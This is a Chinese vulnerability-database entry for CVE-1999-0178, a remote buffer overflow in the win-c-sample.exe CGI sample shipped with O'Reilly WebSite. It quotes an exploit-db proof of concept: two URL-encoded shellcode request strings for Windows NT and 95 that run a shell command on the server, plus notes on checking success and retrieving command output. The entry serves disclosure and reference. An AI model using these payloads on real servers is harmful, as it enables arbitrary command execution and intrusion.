O'Reilly WebSite win-c-sample.exe程序远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105277 漏洞类型 输入验证
发布时间 1997-01-06 更新时间 2006-11-16
CVE编号 CVE-1999-0178 CNNVD-ID CNNVD-199701-025
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20484
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199701-025
|漏洞详情
O'ReillyWebSite(Pro)是一个Windows平台下的Web服务器软件。低版本的Website的一个例程存在缓冲溢出问题,远程攻击者可能利用此漏洞以Web进程的权限执行任意指令。1.1e版的WebsiteforNTWeb服务器在/cgi-shl/目录下包含了win-c-sample.exe程序。此程序有严重的缓冲区溢出漏洞,允许攻击者通过溢出攻击执行任意指令。由于WebSite通常运行在较高权限的帐号下,所以该漏洞导致的问题较严重。
|漏洞EXP
source: http://www.securityfocus.com/bid/2078/info

O'Reilly WebSite (Pro) is a Windows 95/NT Web Server package. Versions 2.0 and below contained a vulnerable sample script, win-c-sample.exe, placed by default in /cgi-shl/ off the web root directory. This program is vulnerable to a buffer overflow, allowing for execution of arbitrary commands on the host machine with the privileges of the web server. Consequences of successful exploitation could range from destruction of data and web site defacement to elevation of privileges through locally exploitable vulnerabilities. 

Windows NT (versions unspecified):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

Windows 95:
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocsx1.htm

The example dos commands just copy the WebSite's readme.1st file, so you
can later check if the exploit worked by trying http://website.host/x1.htm.
Note that the server should respond to these exploits with an "Error: no
blank line separating header and data", because of the "1 file(s) copied"
message appearing without a blank line before it (which is required for
HTTP; if you need a command's output, you can redirect it to a file, and
get that file via HTTP with a separate request).
|参考资料

来源:XF
名称:http-website-winsample(295)
链接:http://xforce.iss.net/xforce/xfdb/295
来源:BID
名称:2078
链接:http://www.securityfocus.com/bid/2078
来源:OSVDB
名称:8
链接:http://www.osvdb.org/8
来源:BUGTRAQ
名称:19970106Re:signalhandling
链接:http://archives.neohapsis.com/archives/bugtraq/1997_1/0021.html